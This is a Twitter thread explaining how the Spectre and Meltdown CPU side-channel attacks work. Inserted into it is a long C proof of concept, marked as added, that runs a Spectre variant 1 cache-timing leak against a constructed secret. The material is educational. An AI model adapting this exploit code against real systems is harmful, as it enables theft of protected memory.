Profile: @gsuberland

Graham Sutherland [Polynomial^DSS]
@gsuberland

Infosec person (he/him) focusing on maritime, hardware, winternals, crypto. Content includes: electronics, tech, mental health, chemistry, lasers, demoscene.

The mining ship Red Dwarf.
poly.nomial.co.uk
Joined: December 2011

© 2020 Twitter
Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

Explainer on #Spectre & #Meltdown: When a processor reaches a conditional branch in code (e.g. an 'if' clause), it tries to predict which branch will be taken before it actually knows the result. It executes that branch ahead of time - a feature called "speculative execution".

05:22 · 4 Jan 2018 · 56 replies · 2,982 retweets · 4,888 likes
Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

The idea is that if it gets the prediction right (which modern processors are quite good at) it'll already have executed the next bit of code by the time the actually-selected branch is known. If it gets it wrong, execution unwinds back and the correct branch is executed instead.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

What makes the processor so good at branch prediction is that it stores details about previous branch operations, in what's called the Branch History Buffer (BHB). If a particular branch instruction took path A before, it'll probably take path A again, rather than path B.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

What makes this interesting is that code is executed *speculatively*, before the result of a conditional statement has completed. That conditional statement could be security-critical. Thankfully the processor is (mostly) smart enough to roll back any side-effects of execution.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

There are two important exclusions to the rollback of side-effects: cache and branch prediction history. These generally aren't rolled back because speculative execution is a performance feature, and rolling back cache and BHB contents would generally hurt performance.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

There are three ways to exploit this behaviour. The Spectre paper describes the first two exploits, with the following results: 1. Kernel memory disclosure from userspace on bare metal. 2. Kernel memory disclosure of the VM host/hypervisor from kernelspace in a VM.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

The first exploit works by getting the kernel to execute some carefully written attacker-specified code which contains an array bounds check followed by an array read, where the read index is controlled by an attacker. This sounds like a big ask, but it's not thanks to JIT.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

On Linux, Extended Berkeley Packet Filter (eBPF) allows users to write socket filters from usermode which get JIT compiled by the kernel in order to efficiently filter packets on a socket. The details aren't important, but it means an attacker can get the kernel to execute code.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

The exploit involves writing eBPF code which compiles to the following steps: 1. Allocate two fixed-size arrays 2. Bounds-check the user-provided index 3. If ok, read from array1 at that index 4. Compute another index from 1 bit of the result 5. Read from array2 at that index

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

There's actually a step before 5, which is "bounds check the read to array2", but we never intend to do an out-of-bounds read here, so it's irrelevant. I omitted it because I ran out of characters.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

In terms of "real" execution, this code always terminates at step 2 when the user passes an out-of-bounds index for array1. But if the processor's branch predictor assumes that check will succeed, it'll speculatively execute the out-of-bounds read in step 3, and continue to 5.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

Here's the clever bit. In step 4 we take the value we got from the out-of-bounds read (which we wouldn't normally have access to) and use one bit from it to select a particular memory address (array index) to read. If b=0 it reads index 0x200; if b=1 it reads index 0x300.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

This ensures that the memory at either index 0x200 or index 0x300 is now cached. The CPU then realises that the bounds check in step 2 failed, so it unwinds back to that branch. However, the data from step 5 is still cached!

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

We can then go in and read the data at 0x200 and 0x300 and see which is cached by measuring how quick the read is. Once we know which index was cached we can directly infer one bit of kernel memory, based on the index selection from step 4.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

There are some details as to how the cache needs to be primed before this attack, but it is possible to do this whole process in a loop and dump kernel memory from unprivileged userspace.
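The five steps above, the training loop, and the cache-timing readout, as an added C example that is not part of the thread and not the author's code. It follows the same shape as the well-known Spectre variant 1 proof of concept: the gadget is plain C rather than eBPF, and "secret" is a constructed string in the attacker's own process standing in for the kernel memory the thread describes, so the whole thing runs as one unprivileged program. The function names (victim_gadget, probe_once, leak_byte) and the 0x200/0x300 slots are this example's own choices; the cache flush and cycle counter are x86-64 intrinsics, with a non-x86 fallback that builds but cannot flush. The same flush+reload probe is what the third approach later in the thread relies on for its readout.

```c
/* Added example (not from the thread or its author): steps 1-5 as a C gadget,
 * the training loop of step 15 and the flush+reload readout of steps 13-14.
 * "secret" is a constructed string in our own process standing in for kernel
 * memory; all names below are this example's own. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__)
#include <x86intrin.h>
static void flush_line(const void *p) { _mm_clflush(p); }
/* Cycles to load one byte; a line left in cache by the gadget is sharply faster. */
static uint64_t time_load(const volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    uint8_t v = *p; (void)v;
    return __rdtscp(&aux) - t0;
}
#else
/* Fallback so the file builds elsewhere: with no cache flush the loop cannot
 * separate the two lines, so leak_byte returns noise on these targets. */
#include <time.h>
static void flush_line(const void *p) { (void)p; }
static uint64_t time_load(const volatile uint8_t *p) {
    struct timespec a, b;
    clock_gettime(CLOCK_MONOTONIC, &a);
    uint8_t v = *p; (void)v;
    clock_gettime(CLOCK_MONOTONIC, &b);
    return (uint64_t)(b.tv_sec - a.tv_sec) * 1000000000ull + (uint64_t)(b.tv_nsec - a.tv_nsec);
}
#endif

#define ARRAY1_SIZE 16u
#define SLOT_BIT0 0x200u /* array2 index touched when the leaked bit is 0 */
#define SLOT_BIT1 0x300u /* ... and when it is 1: a different cache line (step 4) */
static uint8_t array1[ARRAY1_SIZE] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
static uint8_t array2[0x400];
static const char secret[] = "SPECTRE";           /* constructed stand-in for kernel data */
static volatile size_t array1_size = ARRAY1_SIZE; /* volatile: the bounds check stays a real load */

/* Step 4: one bit of the value fetched in step 3 picks which line to touch. */
size_t encode_index(uint8_t value, int bit) {
    return ((value >> bit) & 1u) ? SLOT_BIT1 : SLOT_BIT0;
}

/* Steps 2-5. Architecturally an out-of-bounds x returns 0 and never touches
 * array2; speculatively both loads still run and leave one line cached. */
__attribute__((noinline)) uint8_t victim_gadget(size_t x, int bit) {
    if (x < array1_size)
        return array2[encode_index(array1[x], bit)];
    return 0;
}

/* Both arrays and the secret must be resident: a speculative load that would
 * page-fault brings nothing into the cache. */
static void prime_memory(void) {
    volatile uint8_t sink = 0;
    for (size_t i = 0; i < sizeof array2; i++) array2[i] = 1;
    for (size_t i = 0; i < sizeof secret; i++) sink ^= (uint8_t)secret[i];
}

/* One round of step 15's loop: train the predictor on in-bounds indices, keep
 * array2 evicted, hit the gadget with the out-of-bounds index, then time both
 * candidate lines. Returns the bit, or -1 when neither line stood out. */
int probe_once(size_t malicious_x, int bit, unsigned trial) {
    const size_t training_x = trial % ARRAY1_SIZE;
    flush_line(&array2[SLOT_BIT0]);
    flush_line(&array2[SLOT_BIT1]);
    for (int j = 29; j >= 0; j--) {
        flush_line((const void *)&array1_size);    /* slow the bounds check: wider window */
        for (volatile int z = 0; z < 100; z++) { } /* let the flush land */
        /* Branchless select: malicious_x on every 6th call, training_x otherwise,
         * so the attacker's own control flow gives the predictor nothing to learn. */
        size_t m = (size_t)((j % 6) - 1) & ~(size_t)0xFFFF;
        m |= m >> 16;
        victim_gadget(training_x ^ (m & (malicious_x ^ training_x)), bit);
    }
    uint64_t t0, t1; /* alternate probe order so a prefetcher cannot bias the vote */
    if (trial & 1u) { t1 = time_load(&array2[SLOT_BIT1]); t0 = time_load(&array2[SLOT_BIT0]); }
    else            { t0 = time_load(&array2[SLOT_BIT0]); t1 = time_load(&array2[SLOT_BIT1]); }
    return t0 == t1 ? -1 : (t1 < t0);
}

/* Majority vote over many rounds, one bit at a time; returns a byte 0..255. */
int leak_byte(size_t malicious_x, unsigned rounds) {
    int value = 0;
    prime_memory();
    for (int bit = 0; bit < 8; bit++) {
        int ones = 0, counted = 0;
        for (unsigned t = 0; t < rounds; t++) {
            int v = probe_once(malicious_x, bit, t);
            if (v >= 0) { ones += v; counted++; }
        }
        if (2 * ones > counted) value |= 1 << bit;
    }
    return value;
}

int main(void) {
    for (size_t i = 0; i + 1 < sizeof secret; i++) {
        /* Index that makes array1[x] land on secret[i]; step 2 rejects it architecturally. */
        size_t x = (size_t)((uintptr_t)&secret[i] - (uintptr_t)array1);
        int b = leak_byte(x, 200);
        printf("byte %zu: 0x%02x %s\n", i, b, b == secret[i] ? "(leaked)" : "(noise)");
    }
    return 0;
}
```

Build with gcc or clang on x86-64; the intrinsics need no extra flags. Whether the output reads "SPECTRE" or noise depends on the CPU and on what mitigations are in effect (a microcode or compiler-inserted fence between the bounds check and the load, for example), which is itself the useful thing to learn from running it: the architectural behaviour is identical either way, only the cache state differs.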
Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

The second attack described in the Spectre paper involves poisoning the branch prediction history to trick the processor into speculatively executing code at an attacker-specified address, leading to further cache attacks as described above.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

By performing a carefully selected sequence of indirect jumps, an attacker can fill up the branch prediction history in a way that allows the attacker to select which branch will be speculatively executed when performing an indirect jump.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

This can be very powerful. If I know there's a piece of code in kernel space that exhibits similar behaviour to our eBPF example from before, and I know what the address of that code is, I can indirectly jump to that code and the CPU will speculatively execute it.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

If you've done exploitation before, you'll probably recognise this as being similar to a ROP gadget. We're looking for a sequence of code in kernel space that happens to have the right sequence of instructions to leak information via cache.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

Keep in mind that the execution is speculative only - the processor will later realise that I didn't have the privilege to jump to that code and throw an exception. So the target code has to leak kernel data via cache side-channels like before.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

You'll also notice that we need to know the address of the target kernel code. With KASLR this isn't so easy. Project Zero's writeup explains how KASLR can be defeated using branch prediction and caching as side-channels, so I won't go into the details here. https://googleprojectzero.blogspot.co.uk/2018/01/reading-privileged-memory-with-side.html

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

What makes this extra powerful is that it works across VM boundaries too. Instead of a traditional indirect jump (e.g. jmp eax), we can use the vmcall instruction to speculatively execute code within the VM host's kernel in the same way we would our VM's kernel.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

Finally, there's the third approach. This involves a flush+reload cache attack against kernel memory, similar to the first variant of the attack but without requiring kernel code execution - it can all be done from usermode.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

The idea is that we try to read kernelspace memory using a mov instruction, then perform a secondary memory read with an address based on the value that was read. If you're thinking the first mov will fail because we're in usermode and can't read kernel addresses, you're right.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

The trick is that the microarchitectural implementation of mov contains the memory page privilege level check, which itself is a branch instruction. The processor may speculatively execute that branch like any other.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

So, if you can outrun the interrupt, you can speculatively execute some other instruction that loads data into cache based on the value read from kernelspace. This then becomes a cache attack like the previous tricks.

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

And that's just about it. For full details I recommend checking out the two papers, as well as the Project Zero writeup I linked above. https://spectreattack.com/spectre.pdf https://meltdownattack.com/meltdown.pdf

Graham Sutherland [Polynomial^DSS] @gsuberland · 4 Jan 2018

(this thread was never intended to be quite so long...)